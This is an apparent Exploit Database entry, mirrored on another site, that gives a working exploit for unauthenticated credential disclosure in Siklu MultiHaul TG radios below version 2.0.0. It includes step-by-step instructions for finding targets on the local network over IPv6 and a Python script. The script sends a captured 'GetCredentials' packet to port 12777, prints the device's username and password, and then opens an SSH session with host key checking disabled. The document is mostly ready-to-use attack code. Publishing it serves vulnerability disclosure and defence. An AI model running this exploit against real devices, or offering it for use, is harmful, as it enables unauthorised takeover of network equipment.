Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure

• Exploit Database
• 9 阅读

• 作者： semaja2
  日期： 2024-03-28
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51932/

• # Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
  # Date: 28-02-2024
  # Exploit Author: semaja2
  # Vendor Homepage: https://siklu.com/
  # Software Link: https://partners.siklu.com/home/frontdoor
  # Version: < 2.0.0
  # Tested on: 2.0.0
  # CVE : None assigned
  #
  # Instructions
  # 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
  # `ping6 -I en7 -c 2 ff02::1`
  # 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
  # `ip -6 neigh show dev en7`
  # 3. Execute script
  # `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
  # 4. Enjoy the access
  
  
  
  import socket
  import sys
  import os
  
  address = str(sys.argv[1])# the target
  port = 12777
  
  # Captured command, sends "GetCredentials" to obtain random generated username/password
  cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")
  
  addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
  (family, socktype, proto, canonname, sockaddr) = addrinfo[0]
  s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
  s.connect(sockaddr)
  s.send(cmd)
  data = s.recv(200)
  s.close()
  output = "".join(map(chr, data))
  
  # Split output, then remove trailing noise as string length is always 35
  splits = output.split('#')
  username = splits[1][slice(0, 35, 1)]
  password = splits[2][slice(0, 35, 1)]
  print('Username: ', username)
  print('Password: ', password)
  os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))